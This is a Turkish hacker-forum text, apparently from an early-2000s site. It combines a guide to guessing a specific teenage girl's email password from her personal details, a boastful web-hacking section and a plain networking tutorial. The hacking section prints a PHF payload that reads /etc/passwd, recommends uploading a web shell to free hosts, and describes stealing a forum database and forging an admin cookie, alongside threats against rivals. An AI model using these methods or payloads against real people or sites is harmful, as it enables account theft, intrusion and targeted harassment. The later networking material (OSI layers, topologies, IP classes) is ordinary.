:yaho1Her türlü şifreyi insan mantığını aşarak kırma yolları
Bir siteyi, maili yada başka şifre isteyen bir yeri kırmak istediğimizde aklımıza sınırlı sayıda çare gelir. Bunlardan biride Dictionary (sözlük) Attack dediğimiz yöntemdir.
Bu yöntemle sırayla önceden şeçilmiş bazı şifreler sistemde denenir ve şifre aşılmaya çalışılır.
Şimdi diyelim ki 17 (21-05-1990) yaşında olan melis adında birinin Hotmailini kıracağız. Bu şahsı az buçuk tanıyoruz. Mesela aynı apartmanda oturuyoruz, ne kadar bu işlerden çaktığınıda biliyorsunuz. O zaman başalyalım. Bu kızın soyadı Taş olsun yani Melis Taş. Cep telefonuda 0 535 *** ** ** olsun.
Bu kızın en basitinden şifresini bir 1990 koymak ister sonra olamdı der 19901990 koymak ister o da olmadı 2105984 koymak ister. Bunlarla doğum tarihine göre kombinasyonlar yapabiliriz. Daha çok seçenek var. Bu kızın şifresi 0535 *** ** ** olabilir. Yada *** ** ** olabilir.
Şifre TaşMelis olabilir MelisTaş olabilir, kedisinin adı pamuk olsun, pamukmelis olabilir. melsipamuk olabilir. yada arsenal li olsun olsun o zaman arsenal1990 olabilir. melisarsenal olabilir. melisarsenalpamuk olabilir. Yada ev telefonuda olabilir.
Diyelim ki gizli sorusunu bulucaz. Soru yanlızca "kola" diye bir kelime. O zaman onun cevabı yukardakinin aynısı yani "kola" olabilir. Yada sanane, bilmiyorum gibi sözcükler olabilir.
Yada şifre yedi tane 7 , üç tane 3 de olabilir. 54321 olabileceği gibi 123456789 da olabilir. 0000 da olabilir 9876543210 da olabilir.
Oturduğu apartman, şehir, sokak isimleride kullanılır. Annesinin kızlık soyadı. Yada okul numarası. Sonuçta kişi unutmamak için herkesin bildiği ve kullanılan bazı numaralardan ve isimlerden bir kombinasyon yapmak isteycektir. Bizim burda yapmamaız gereken burda bu kişiye göre yapılabilecek kombinasyonları tahmin edip bir sözlük hazırla*****. Dict. attack yapmak olacaktır. Baya uzun süren bir iş olabilir ama bu tarz şifreler kullanan biriyse kesin düşer tuzağa.
Yada rakamlardan 98745632210 olabilir. Bu sizin düşünce kabiliyetinize bağlı daha çok üretebilirsiniz.
Bu tarz klavye oyunlarıyla hazırlanmış, ayrıca kişiye özel olarakta hazırlanmış bir sözlüğün; sanıyorum ki başakalarının şifrelerini bulmakta büyük yararı olur, ki oluyor zaten.
Bazen şahıslar en sevdikleri hayvanı, eşyayı, şarkıcıyı, futbolcuyu falanda yazarlar.
Demek ki şahsi olan biligilere ve klavye oyunlarına dikkat etmemiz gerekiyormuş. Önemli olan kişi için kolay hatırlanabilecek bir şey yazmak. Herkes şifrelerini bu mantıkla bulur. Eminimki bu yazıyı okuyanlardan, yani sizlerden birileri de burda kendi şifresinin formülünüde görmüştür Dedim ya herkes bu tarz şeyler kullanıyor. Ama bilmiyor ki bu yöntemleri bazıları zaten biliyor.
Her zaman şifrenizi anlamsız ama sizin ezberlediğiniz küçüklü büyüklü harfler ve rakamlardan oluşan en az 8 haneli kombinasyonlardan seçin ve hiçbir yere yazmayın! Yazarsanızda kimsenin ne olduğunu anlayamayıcağı şekilde farklı bir yerlere yazın.
Bunca seneye kadar ben, aslında hiçbir makinayı yada sistemi hack etmedim! Şu güne kadar hep o sistemin arkasında bulunan insan mantığını aştım. Bu benim için daha kolaydı. Çünkü sistemler değişiyor, yamanıyor ama insan mantığı milyonlarca yıldır aynı. Bunun örneğini SchoolBus TR nin FireWalları aşma sisteminde görebilirsiniz...
Şimdi web hacking olayı Hack olayının en akıl isteyen kısmıdır. Şimdiden söylüyorum aranızda bu işlerden anlamayan veya kafası bu tarz işlere basmayanlar varsa bu yazıyı okuyupta vaktini boşa harcamasın. Bu işlerde yeteniği olan kişiler yanlızca web hacking yapabilir. Gerisi avcunu yalar.
Olaya giriyorum. Şimdi en önce olayı mantık ve felsefe sınırlarına oturtalım. Bu benim kendi felsefem. Felsefem ise şu: Bir sistemin nasıl çalıştığını bilmeden, o sistemi kıramazsın! Bunu bir diğer anlamda açıklarsak bir sistemin arkasını görmeden onu önden çökertemezsin.
Peki ne bu? mesela senin bir web siten yok! Ama web hacking yapmak istiyorsun mümkün mü? Hayır değil! Nasıl işlediğini bilmediğin birşeye zarar veremezsin.
Peki yöntemler neler. Herkezin yapacağı basit yöntemler var başta. Mesela Brute Force, Dict Attack falan. Bunları yapmak için nerdeyse web bilmeye bile gerek yok. Sadece FTP bil yeter. Tabii bunlar Lamerlara göre şeyler, biz olayı aştığımız için fazla bilgi isteyen şeyleri yapıcaz. En önce bir sisteme girmek için açık olması gerekli ki açıktan dalalım. Nasıl açıklar olabilir bunlar, mesela bir script açığı PHF gibi. PHF kullanan sitelere şunu yazarsak bize şifrelerin bulunduğu yer gözükür /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd . Ne bu? Açık tabii ki. Çoğu site yamamıştır şimdi ama bu bir açık. Nasıl bulunur? Script yazmayı bilenler bunu bulur. Kaynak koda bakarsın, açık olduğunu işleyiş tarzından anlarsın işte YOL! Burdan şifreleri alırsın bazılar Shadowed falan olur, bazılarını kırmak gerekir falan Cracker Jack tarzı programlarla kırarsın olur biter.
Şimdi bu bir yöntemdi ama başkalarıda var hatta hayal bile edilmemişleri var bu işlerde.
Mesela diğer bir yöntem, Commander.PL. şimdi diyeceksiniz ne bu? Bu commander.pl upload edildiği UNIX makinalara CHMOD 777 ve 755 sayesinde istediğiniz komutu girmenizi sağlayan birşey. Mesela benim hostingimi The-King sağlıyor ve site adı Hackerpower.com. Şimdi bana ayrılan subdomain olan spmaster a ben bunları upload edip çalıştırsam, ftp ile yetkimin olmadığı dosyalara ulaşır istediğimi silerim falan! Anladınız mı? Bakın ne kadar basit! Gidin bunu beleş yer veren yerlere yapın bakalım şimdi.
Diğer bir yöntem derim ama o kadar çokki. Zaten bu yazıyı okuyorsanız ya kendinizi geliştirmek istiyorsunuzdur yada bunu öğrenmek istiyorsunuzdur. Söyliyim şimdiden ikinci seçenektekiler için üzgünüm...
Şimdi benim bulduğum bir yöntem! Bunu açıklamıyacaktım çünkü sonuçta bahsediceğim şahıs benim sitemin bir ziyaretçisi. Ondan çok özür diliyorum bunu anlattığım için ama merak etmesin bu yazıyı okuyanların %99 u sana zarar verebilecek kadar bu işleri iyi bilmiyor. O yüzden sanıyorum sakıncası olmayacaktır.
Şimdi başlıyım, Panick bana jayjay diye bir dostunun olduğunu söyledi, bende baktım bize üye olmuş site kısmındada TYMSAH.COM yazıyor. Merak ettim siteye gittim. Bir baktım ki onlarda bizim formumumuz olan IKONBOARD un aynısını kullanıyor. Neyse baktım tymsah benim türkçeleştirmediği yerleri de türkçeleştirmiş forumun. Bende benim forumdan ve onun forumdan ona PM attım ve bu dosyaları istedim. Bana vereceğini söyledi, aradan vakit geçti dosyaları alamadım çünkü tymsah sanıyorum ki evinde değilmiş şehir dışındaymış.
Bende baktım olmuyor bekle bekle, Allah’a şükür bu işlerden anladığım için hemen yapmam gerekeni yaptım ve onun bana yollayacağı dosyaları kendim aldın nasıl mı?
Ben ikonboard’un dil dosyalarını falan nereye kurduğunu biliyorum. Yani tüm klasörlerin nerede ve hangi isimle olduğunu biliyorum. Çünkü bende ikonboard kullanıyorum. Bende madem öyle dedim, ve forumun dil dosyalarını indirmeye başladım yaptığım şu idi. Mesela hata mesajlarını bulunduran dil dosyasını istiyorsam yazmam yeterli. Dan diye ben bu dosyayı download edebiliyorum.
İşte ben böylece tüm dosyaları download ettim ve gördüm ki onun forum ile benim forum farklı versiyon olduğundan dosyalar uyuşmuyor
Herneyse ben istediğimi aldım ama iyi bir insan olarak. Peki diyelim ki ben kötü biriyim ve neler yaparım. İlk yapıcağım iş forumun DATABASE dosyasını ele geçirmek olacaktır. Bu sayede ben tüm forumdaki kullanıcılara şifrelere ve maillere ulaşabilirim. Bu kadar basit! Ha bu şifereler ENCRYPT edilmiş olacağından siz okuyamazsınız bunları. Bunu DECRYPT etmeniz gerekir. Tabii ben okurum bunları. Olay basit aklını kullanacaksın.
Kendi bilgisayarımdaki COOKİE dosyasını açarım, Forum adminin ID sini ve ENCRYPT edilmiş şifresini o databaseden alırım ve kendi COOKİE dosyama koyarım. Forumun sayfasına girince bir bakarım ki ADMİN olarak forumdayım Daha sonra admin şifresini değiştiririm. Sonrada sitenin tamamını hack ederim. Bu da basit en önce aldığım şifre ile FTP de bir deneme yaparım. Baktım olmuyor, bu forumların File Managerları var, isteyin dosyayı Admin odasından siliyorsun değişitriyosun falan. Ona girerim ve gerisini siz düşünün artık. Bu iş bu kadar kolay!
Mesela bir siteyi tabandan ack edip ROOT olacan. Bu işte kolay ama en önce arkayı bilecen. Nasıl mı? Mesela benim dostum The-King adminlik yapıyor. Biraz kafayı çalıştırırsa manyak bir hacker olur çıkar. Mesela ben onun gibi adminlik yapıyor olsaydım şu anda isteyenin eline sitesini vermiştim bile... Ama arkayı bilmediğim için önden o şekilde birşeyler yapamıyorum. Tabii bu site hack edemediğim anl***** gelmiyor. Bilene ve kafası çalışana/çalıştıarana herşey kolay walla!
Yaaa millet bir ton adam döküman yazmış Allah razı olsun. Beni döküman yazma sorununundan kurtarmışlar. Gidin hack arşivimizdeki dökümanları okuyun diyoruz hala gelip Web Hack nasıl yapılır diye soruyonuz be kardeşim. Yaw bu sorunun tam bir cevabı olsaydı siteler ve forumlar bölüm açmazdı bunun için. Böyle salak salak genel sorular sorupta sonra bana gelip ZORUNUZA MI GİTTİ diyen LAMER kaynayan ve hiçbirşeyden anlamayan forum ve sitelerden gelen bu tarz adamları öldüresim geliyor yaw!
Ya arkadaşım sen kimsin be yaw? Sen kimsinki insanlara saygısızlık yapıyorsun?
İnanmıyacaksınız ama ben bunuda söylüyorum çünkü manyak derecede sinirlendim, şu an türkiyenin en iyi hack sitesi sayılan ve bir ton üyesi olmasına rağmen, bilgi olarak bence sıfır olan bir sitenin açığını buldum! Beni bilen bilir ben asla sallamam. Bu açık ile neler yapıcağımı aklınız hayaliniz almaz! Ama ben birşeyler yapmıyorum hatta oradan bana laf bile gelse dokunmuyorum. Ben bilgisiz insanları aşağılayacak, onları üyelerine rezil edecek biri değilim. Ben dostluk yanındayım. Ama gün gelirde birileri benim düşmanım olursa o zaman ben bildiklerimi kötü işler için kullanırım ve taş taş üstünde kalmaz! Gördünüz Tymsah.com u hack etmek kolay idi. Ben size burda daha kötü olsaydı Database için gereken yolu da verirdim, nasıl okunacağını falanda. Ama yapmam! Tymsah arkadaşım, bana PM at ben sana bu sorundan kurtulma yolnunu anlatayım.
Gerçi ülke bu işlerden anlamayan LAMeRLAR ile kaynıyor ama olsun belki bilen biri sana verir. Nolur nolmaz.
Burdan beni, arkadaşlarımı ve sitemi çekemeyen Lamer arkadaşlara sesleniyorum, benim ve dostlarımın bilgisinden şüpheniz varsa bunu ortalık yerde konuşmayın gelin bize yüz yüze halledin. Biz birer atoma benziyoruz ve gün geldiğinde bir ülkeyi dahi yok edebilecek güce sahibiz. Ama gücümüz aklımızın esiri! Bu yüzden sıyırdınız gene...
Alınan ve kırılanlardan özür diliyorum, ama ne ekerseniz onu biçersiniz arkadaşlarım. Ben kimseye durduk yere çatmam. Diyeceğinizi diyin ve sonrada barışalım gitsin. Şundan emin olunki benden düşman değil bir dost istersiniz...
Soracaklarınızı uygun bir dille sormaya gayret ediniz aksi takdirde yanlış anlaşmalar olabiliyor.
Bide şu aralar birileri yada birisi benim açtığım tüm sitelere saldırıda bulunuyor. Bu saldırılara bis D.o.S diyoruz. Yani Denial Of Service. Bu tarz saldırılar için aşağıda açıklamayı tekrar yapacağım. Ama şunu belirtiyim bu saldırıları yapan her kim ise hem beni sevmiyor hemde namezero gibi dev bir siteyi zorlayacak kadar güçlü bir bağlantıya sahip (en az T1) ve %90 bu kişi türk değil. Diyecek bişey bulamıyorum ama bu kişinin ipsini ele geçirirsem ki geçiririm. Başı fena ağrır...
D.o.S:
D.O.S (Denial of Service) dediğimiz ataklar, T1 T3 dediğimiz yüksek bağlantılı makinalar yada basit Win tabanlı ve Dial-up tabanlı makinalar tarafından yapılan ping gönderme aşırı paket yollama ve BandWitdh dediğimiz sınırlamalı veri transferi (bizim site bu yüzden hergün 1 saat kapanır. 3GB veri transferimiz var.) dediğimiz olayın üstüne çıkarak Rate Limit Exceded gibi server hataları almamızı ISPden komamaızı ve bağlantımızın crash olmasını sağlayan NUKE de dediğimiz ataklardır. Bu atakları herkes programa ihtiyaç dumadanda yapabilir ama bu iyi bir bağlantı ve Win atağı değilse Unıx gibi sağlam bir sistem gerektirir. WinXP ve 2000 bu ataklar için önlem almış sistemlerdir ve internete hızlı bağlanırlar. Daha çok bilgi için Buaraya Bakın.
Beni sevmeyen birisi hem spymastersnake.com a hem ********* deki siteme hemde bu forumlara D.o.S saldırılarda bulunuyor.
Eğer No Space Left On Device diye bir hata görürseniz bu bize saldırıyor demektir.
Saldıran kişi Türk değil ama çok güçlü bir şekilde saldırıyor ki spymastersnake.com a host olan Namezero.com bile bundan etkileniyor. Tabiii buna hackerpower.com ve ********* de dahil. En az etkilenen ********* şu anda....
Şu aralar bizim sitenin counter’ının çalışmamasının nedenlerinden biride sitemizin counter hesabına sahip olduğu sitenin bu ataklara mağruz kalmasındandır. Hala bu ataklarla uğraşmaktalar. Ve serverda yenilikler yapmadan bir firewall sistemine geçmedende bence bu olayı düzeltemezler bence. Unutmayın bir Nuke yapmak için nuke yapacağınız sistemden iyi bir sisteme ve bağlantıya ihtiyacınız var. Ama AGRESSOR denilen bir program akıllıca kullandığı bir yöntem bunu başka maiknalara yaptırabiliyor. Ve bu program türk yapımı.
A { TEXT-DECORATION: none } A:hover { COLOR: red }
Temek Ağ (Network) Kavramları
Bu çalışmayı bana word dökümanı olarak gönderen İsmail Hakkı Şahin’e teşekkürler.
Ağ (network) kavramı, var olan kaynakların kullanıcılar tarafından beraber kullanılması, bilgiye ortak ulaşmaları ve buna bağlı olarak da maliyet ve zaman tasarrufu sağlanılması gereksiniminden ortaya çıkmıştır. Bu temel kuraldan hareketle oluşan ağlar günümüzde uzaktaki bilgiye erişim (Web), kişisel iletişim (E-mail, ICQ, IRC, Video-konferans), interaktif eğlence (Web-Tv, oyunlar) gibi kavramlarla hayatımızda önemli bir yer kaplamaktadır. Bir ağın oluşabilmesi için minimum iki makineye, bunlara takılı olarak ağ kartlarına ve de bağlantıyı sağlamak içinde kabloya ihtiyaç vardır.
Ağların Gelişimi ve Ağ Teknolojileri
Ana Makine (MainFrame) Modeli:
Ağ kavramı ilk olarak Ana Makine (MainFrame) teknolojisi ile ortaya çıkmıştır. Ana makinenin kendi işlemcisi (CPU), sabit diski (harddisk), ve bunları kumanda etmek için bir ekranı ve klavyesi ve de terminallere bağlı seri portları vardı. Bu aptal terminaller (dumb terminal) sadece ekran ve klavyeden oluşurdu, yani bir deyişle pasif makinelerdi. Terminallerin yerel bir disk alanları da olmadığı için bilgiyi ana makine üzerinde saklarlardı. Tüm yük ana makinenin üzerindeydi ve bu yüzden çok pahalıydı. En büyük dezavantajı tabii ki güvenilir olmaması, yani ana makinede çıkacak bir sorunun tüm sistemi etkilemesi, terminallerin kendi başlarına işlem yapabilme kaabiliyetlerinin olmaması idi. Bu önemli sorun halen çok popüler olan İstemci/Sunucu (Client/Server) modelinin doğmasına yol açtı.
İstemci / Sunucu (Client/ Server) Modeli:
İstemci/Sunucu modeli ile pasif terminaller yerine kendi başlarına işlemler yapabilen ve kendi sabit disklerinde programlar saklayabilen makineler geldi. Böylece her istemci kendi başlarına belirli işlemleri yerine getirebilmekte, yetersiz durumda kaldıklarında ise o işe özelleşmiş olan sunuculara başvurmakta idiler. Örneğin her istemcide ofis uygulamaları, masa üstü yayıncılık, oyun programları kullanılması buna rağmen veri tabanı ya da web gibi uygulamalarda bir sunucuya erişilmesi gibi.
Eşlenik Ağ (Peer to Peer) Modeli:
İstemci/Sunucu modelinin gelişmesi ve yaygınlaşması ile birlikte istemcilerin daha ön plana çıktığı, özelleşmiş sunuculara ihtiyaç duyulmayan ağ örnekleri de ortaya çıkmaya başladı. Bu ağlarda makineler yaklaşık özelliklerde idi ve işleyiş olarak birbirlerine üstünlük sağlamıyorlardı. Örnek; tamamen Windows 95/98 kullanan ağlar.
Ağ Teknolojilerinde Güç Sıralaması
İnternetin Doğuşu
İnternet tam anlamıyla ağlar arası ağdır. Bu kavramı açmak gerekirse büyük küçük binlerce ağın birleşmesinden oluşmuş en büyük ağdır. Bir kişiye, kuruluşa, ülkeye özel değildir.
İnternet kavramı aslında 1969’da savaş sonrasında düşünülen DARPA (Defense Advanced Research Project Agency - İleri Düzey Savunma Araştırmaları Kurumu) isimli basit bir projeden ibaretti. Bu proje büyük bilgisayarları birbirine bağlamayı ve ne olursa olsun bu bağı koparmamayı amaçlıyordu. Klasik bir ağ tarzında, bu ağdaki tek bir bağlantının kopması veya ana sunucunun imha edilmesi durumunda bu ağ çökecektir. Bu yüzden teknisyenler istemci-sunucu modeli yerine her bilgisayarın birbirine eşit özelliklerde olduğu türdeş ağ modeli tercih ettiler. İlk bağlantı California ve Utah’ta olan 4 bilgisayar arasında idi. Yavaş yavaş üniversitelerin de bağlanmasıyla ağ giderek büyümeye başladı. Bu proje daha sonra ARPANET (Advanced Research Projects Agency Network) adını aldı. Sivil kişi ve kuruluşların da bağlanmasıyla tüm Amerikayı kapsamaya başladı. ARPANET in beklenenden fazla büyümesiyle askeri kısmı MILNET adıyla ayrıldı ve daha sonra da ARPANET gelişerek bügünkü adıyla INTERNET !
adını aldı.
Ağ Çalışma Prensipleri
Temel olarak ağlarda iki tip çalışma prensibi vardır:
Yayın (Broadcast): Ağa atılan bir paketin her bilgisayara gönderilmesi.
Noktadan noktaya (Point to Point): Ağa atılan bir paketin özel bir noktaya iletilmesi.
Ağların çalışma prensipi genelde yayın tarzındadır. Buna rağmen İnternet omurgası noktadan noktaya çalışmaktadır.
Büyüklüklerine Göre AğlarLAN (Local Area Network) Yerel Alan Ağı: Kurulabilecek en küçük çaplı ağ olmakla birlikte büyüklükleri bir oda veya bir binayla sınırlı kalmayıp 1 km’ye kadar çıkabilmektedir. Örneğin küçük ve orta dereceli kurumların ağları.
WAN (Wide Area Network) Geniş Alan Ağı: Aralarında 1 km’den fazla mesafe olan LAN ların birleşmeleriyle meydana gelirler. Türkiye’deki en meşhur WAN’lardan biri Turnet (Türkiye iç omurgası, bir diğeri Ulaknet’tir (Üniversiteler arası ağ.
MAN (Metropolitan Area Network) Metropol Alan Ağı: WAN’ların şehir bazında ya da şehirler arası birleştirilmeleriyle oluşur, fakat günümüzde MAN kavramı kullanılmamakta, yerine WAN terimi tercih edilmektedir.
Mesafe Tablosu
10 m Oda
100 m Bina
1 km Fabrika / Kampüs
10 km Şehir
100 km Ülke
1000 km Bölge
1000 km Dünya
Ağ Topolojileri
Ağın fiziksel yapısı, kablolarla bağlantı şeklidir. Temel 3 topoloji vardır:
Kuyruk (Bus):
Doğrusal bir hat üzerinde kurulmuş bir yapıya sahiptir. Makineler kabloya T-konnektörler aracılığıyla bağlanırlar ve kablonun rezistansını düşürmemek için açıkta kalan iki ucuna sonlandırıcılar takılır. 10 mps hızda çalışır. Bir makinede veya kablonun herhangi bir noktasında oluşan arıza tüm sistemin çalışmasını engeller. Bu dezavantajına rağmen kurulumu en kolay yapı olduğu için tercih edilmektedir. Maksimum kapasitesi 10-12 makine olup, iki makine arası maksimum mesafe ince eş-eksenli (thin coaxial) kablo kullanıldığında 185 m, kalın eş-eksenli (thick coaxial) kablo kullanıldığında 500 metredir.
Zincir (Ring):
Kuyruk yapısındaki bir ağın sonlandırıcıların çıkarılarak iki ucunun birleştirilmesiyle oluşan ağ yapısıdır. En yaygın uygulaması IBM’e ait olan Token Ring topolojisidir. 4 mps veya 16 mps hızda çalışır. Kuyruk yapısının tüm özelliklerini taşımakla birlikte ağda bulunan düşük hızlı bir kart tüm sistemi yavaşlatır. Zincir yapısında ağda varolduğu düşünülen sanal bir jeton (token) tüm makineleri sırayla dolaşır ve bilgi alışverişi bu şekilde sağlanır.
Yıldız (Star)
Diğerlerinden farklı olarak, kablo,konnektör ve ağ kartına ek olarak hub,switch gibi diğer cihazlar kullanılarak oluşturulan ağ yapılarıdır. Genelde UTP (Unshielded Twisted Pair) korumasız çift dolanmış ya da STP (Shielded Twisted Pair) korumalı çift dolanmış kablo kullanılarak oluşturulur ve bilgisayarlarla bağlantı cihazının (hub gibi) maksimum mesafesi 100 metredir. Kullanılan çift dolanmış kablonun ve ağ kartının çeşitine göre farklı hızlarda çalışır. Her bilgisayarın bağlantısındaki problem yalnızca onun çalışmasını engellerken, ağdaki diğer cihazlar çalışmalarına devam ederler. Ancak bağlantı cihazlarındaki (hub, switch) problemler, o cihaza bağlanan tüm cihazların çalışmasını engeller. Diğerlerine göre daha güvenilir fakat pahalı çözümler sunar.
OSI Katmanları
Her teknojik üründe olduğu gibi ağlarda da standartları belirleyen bir kuruluş vardır. Bu kurum ISO (International Standards Organization) olarak bilinir ve ağ haberleşmesinde 7 katmandan oluşan OSI (Open System Interconnection) açık sistemler arası bağlantı kurallarını belirlemiştir. Bir ağ oluşturmak için fiziksel gereksinimlerin dışında, cihazların haberleşebilmeleri için ortak bir anlaşma biçimine yani bir takım protokollere ihtiyaç duyulur. Her protokolün çalıştığı katman yaptığı işe göre değişmektedir. Bu bahsedilen katmanlar şu şekilde sıralanmaktadır:
7 Uygulama / Application
6 Sunum / Presentation
5 Oturum / Session
4 Taşıma / Transport
3 Ağ / Network
2 Veri iletim / Data Link
1 Fiziksel / Physical
Uygulama katmanı kullanıcıya en yakın olan ve programla iletişimini sağlayan katman, fiziksel katman ise en uzak olan ve kablodaki veri transferini içeren katmandır. Bir veri demeti, programın uygulama katmanından fiziksel katmana kadar çeşitli işlemlerden geçip (enkapsüle edilip), kablo üzerinden ağa ve oradan da diğer bilgisayarlara ulaşıp tam tersi işleme tabi tutularak, uygulama katmanına çıkarak diğer kullanıcılara iletilir. İnternette ve ağ uygulamalarında yaygın olarak kullanılan TCP/IP protokolünün uygulanmasında ise 6 ve 5 numaralı katmanlar uygulama katmanının içine dahil edilir ve sonuç olarak ortaya melez (hybrid) bir yapı ortaya çıkar.
TCP / IP Modeli:
7 Uygulama / Application
------
------
4 Taşıma / Transport
3 Ağ / Network
2 Veri iletim / Data Link
1 Fiziksel / Physical
Melez (Hybrid) Model (OSI & TCP/IP)
5 Uygulama / Application
4 Taşıma / Transport
3 Ağ / Network
2 Veri iletim / Data Link
1 Fiziksel / Physical
Ortaya çıkan bu melez model bundan sonraki anlatımların temelini oluşturacak ve her katman detaylarıyla ayrı başlıklar altında incelenecektir. Bu modele göre katmanlarda çalışan bazı protokol örnekleri ise şöyledir:
5 HTTP,TELNET,SMTP, IRC
4 TCP
3 IP
2 PPP
1 BNC
5 CNC
4 SPX
3 IPX
2 Ethernet
1 UTP
Fiziksel Katman
Bu katman tamamiyle fiziksel bağlantıdan sorumlu olup, kablo, konnektor gibi parçalardan meydana gelmektedir.
Ağ yapılarında kullanılan kablo türleri:
Eş-eksenli (coaxial / BNC): Televizyon kablosunun daha esnek ve ince olanıdır. Bakır tellerden ve üzerinde manyetik korumadan ibarettir. İnce ve kalın olmak üzere iki çeşittir. İnce olanının taşıma mesafesi 185m. Kalın olanının ki ise 500 metredir. Bu nedenler kalın eş-eksenli kablolar genelde omurga yapılarında kullanılır.
Çift dolanmış (twisted pair / UTP-STP): 8 tane çifte dolanmış telden ibarettir. 10 Mbit hızda çalışırken bunların yanlızca 4 tanesi kullanılır. 100 Mbit çalışabilmesi için bu 8 telin belirli bir sıra takip eder durumda bağlanması gerekmektedir. Korumalı (STP) ve korumasız (UTP) olarak iki çeşittir. STP genelde fabrikalar gibi manyetik alanların ya da fiziksel darbenin çok olabileceği yerlerde tercih edilir ve daha pahalıdır. Hıza göre şöyle ayrılır:
CAT3 10 mps.
CAT4 4-16 mps.
CAT5 100 mps.
CAT6 1000 mps.
CAT7 1000 mps.
Bunlar dışında fiber kablo, kablolu TV, telefon hatları veya kiralık hatlar (leased line) fiziksel katmana dahildir.
Yükseltici (Repeater): Kablonun kapasitesinden daha fazla mesafelere bağlantı kurulması gerektiğinde araya bir yükseltici konularak sinyalin güçlendirilmesini sağlayan cihazdır.
Hub: Yıldız yapısındaki ağlarda merkezi bağlantıyı sağlayan cihazdır. Üzerindeki port sayısıyla isimlendirilir ve bu portlara makineler takılır. Hub aslında içerisinde tüm portları birbirine bağlayan kablolardan oluşmuş bir cihazdır ve kablolardan taşınan bilgiyi anlama kapasitesine sahip değildir. Yanlızca bir porttan gelen paketleri diğer bütün portlara yayın (broadcast) şeklinde iletir. Bu yüzden fiziksel katmana dahildir.
Modem: Bilgisayarın dijital sinyallerini analoga çevirerek kablo üzerinden iletilmesini sağlayan cihazdır. 19600, 28800, 57600 Kb hızlarında çeşitli tipleri vardır. Kiralık hatlarda kullanılan modemlere senkron modem, çevirmeli bağlantılarda (dial-up) ise asenkron modem kullanılmalıdır.
Veri İletimi Katmanı (Data / Link)
Bu katman framelerle uğraşır. Giden veri akışının düzgün olmasını sağlar. Hata düzeltme yapar. Bütün bu işlemlerden sorumlu olan eleman ağ kartıdır. Ağlarda bulunabilen frame tipleri ise şöyledir:
802.2 Ethernet II
802.3 Ethernet
802.4 Token Bus
802.5 Token Ring
Mac (Media Access Control) Adresi: Ağ kartı olan her makinenin bir de MAC adresi vardır. Bu adres o ağ kartı üzerine, üretildiği firma tarafından ROM üzerine kaydedilir ve bir daha değiştirilemez. MAC adresi ait olduğu kartın bağlı olduğu makineyi bulunduğu LAN içerisinde ayırt etmekte, daha doğrusu haberleşmede kullanılır. Her üretici firmaya ait olan MAC adresi havuzu farklı olduğundan teorik olarak aynı MAC adresi iki farklı kart üzerinde bulunamaz. Bu olasılık gerçekleşse bile aynı ağ ortamı içerisinde çalışmadıkları sürece ağda bir problemle karşılaşılmaz.
Switch: MAC adresleri mertebesinde çalışan bir cihazdır. Portlarına bağlanan makinelerin MAC adreslerini kendi tablosuna kaydeder ve switch içerisindeki data transferi noktadan noktaya gerçekleşir. Switchler hublara göre daha akıllı ve pahalı cihazlardır ve kendi üzerlerinde işlemcileri ve hafızaları vardır. Switch ler yanlızca makinelerin direk olarak bağlanması için değil ayni zamanda ağların yükünü azaltmak için kullanılırlar. Diyelim ki birbirine bağlı 4 adet 16 portluk hub var. Bu ağdaki yayın trafiği ve paket çarpışmaları bayağı yüksek olacaktır. Bu durumlarda ağa bir merkezi switch koyup buradan hubları besleme yöntemine gidilmelidir. Böylece her bir hubda oluşan trafik diğer hublara yayın olarak yansımayacak ve lokal kalacak, hublar arası iletişm gerektiğinde ise noktadan noktaya gerçekleşecektir. İyi bir switch yüksek bir hafızaya, portlara aktarım ve portlar arası iletim hızına sahip olmalıdır. Eğer port başına düşen hafıza veya dinamik olarak paylaşılan hafıza düş!
ük ise daha sonra gelen paketler o portun hafızasında tutulamıyacak ve tekrar yollanması istenecektir. Switchler bir ağı hızlandırır fakat ikiye bölmezler.
Ağ (Network)Katmanı
Ağ katmanının tek görevi adreslemeyi sağlamaktır. Adresleme bir anlamda ağdaki paketin yolunu bulabilmesidir. İnternette adresleme için kullanılan protokole IP, bu protokolun kullandığı adreslere ise IP adresleri denir. IP adresleri her biri 8 bit yer kaplayan ve 0-255 arsında olan 4 oktetten oluşurlar. IP adresleri birinci oktetlerine göre 5’e ayrılırlar:
A grubu 0.0.0.0 - 127.255.255.255
B grubu 128.0.0.0 - 191.255.255.255
C grubu 192.0.0.0 - 223.255.255.255
D grubu 224.0.0.0 - 239.255.255.255
E grubu 240.0.0.0 - 255.255.255.255
Tüm ağlarda yanlızca A,B ve C grupları kullanılır. D grubu multicast adı verilen IP leri grupla***** mesaj gönderen uygulamalarda (multimedya gibi) nadir olarak kullanılır. E grubu ise reserve edilmiştir ve kullanılmamaktadır.
IP adresleri Avrupada RIPE adı verilen bir kuruluş dağıtmaktadır. Herhangi bir IP yi kullanabilmek için RIPE e başvurup, onun size tahsis ettiği adresleri kullanmanız gerekmektedir. Aksi halde ciddi sorunlarla karşı karşıya kalmanız içten bile değildir. Fakat bu bahsedilen 5 grup içerisinde halkın kullanımına açılmış ve İnternet üzerinde kullanılmayan özel (private) IP adresleri vardır:
A grubu - 10.0.0.0
B grubu - 172.16.0.0
C grubu - 192.168.0.0
Yukarıda belirtilen özel IP lerin kullanımı herkese açıktır. Bunlar dışında bir de test amaçlı kullanılan ve her makinenin kendisini belirttiği kabul edilen bir başka IP adresi de 127.0.0.1 dir.
IP adresleri her zaman alt ağ maskesi (subnet mask) ile birlikte kullanılmaktadır. Subnet mask bir IP adresinin bağlı olduğu ağ adresini belirlemeye yarar. Standart subnet mask lar şu şekildedir.
A grubu - 255.0.0.0
B grubu - 255.255.0.0
C grubu - 255.255.255.0
Buna göre her gruptan birer IP adresi alıp, ilgili ağ adreslerini bulursak:
A grubu - 255.0.0.0 - 10.91.7.3 - 10.0.0.0
B grubu - 255.255.0.0 - 130.44.51.6 - 130.44.0.0
C grubu - 255.255.255.0 - 200.15.1.1 - 200.15.1.0
Yukarıdaki tablo bölünmemiş ağ adresleri, yani standart alt-ağ maskeleri ile geçerlidir. Bölünmemiş ağ adreslerinde bulunan IP adresleri sayıları ise şöyledir:
Grup Ağ Adresi Sayısı Adreslenebilir Makine Sayısı
A 126 (255*255*255)-2
B 63*255 (255*255)-2
C 31*255*255 255-2
Bir ağ adresindeki IP adreslerini ikinin üsleri şeklinde bölüp birden fazla ağ oluşturmak mümkündür. Buna alt-ağ oluşturmak (subnetting) denir. Bunu yapmak için bölümlenmiş alt-ağ maskeleri kullanmak lazımdır. Bu değerler aşağıdaki tablodaki gibidir:
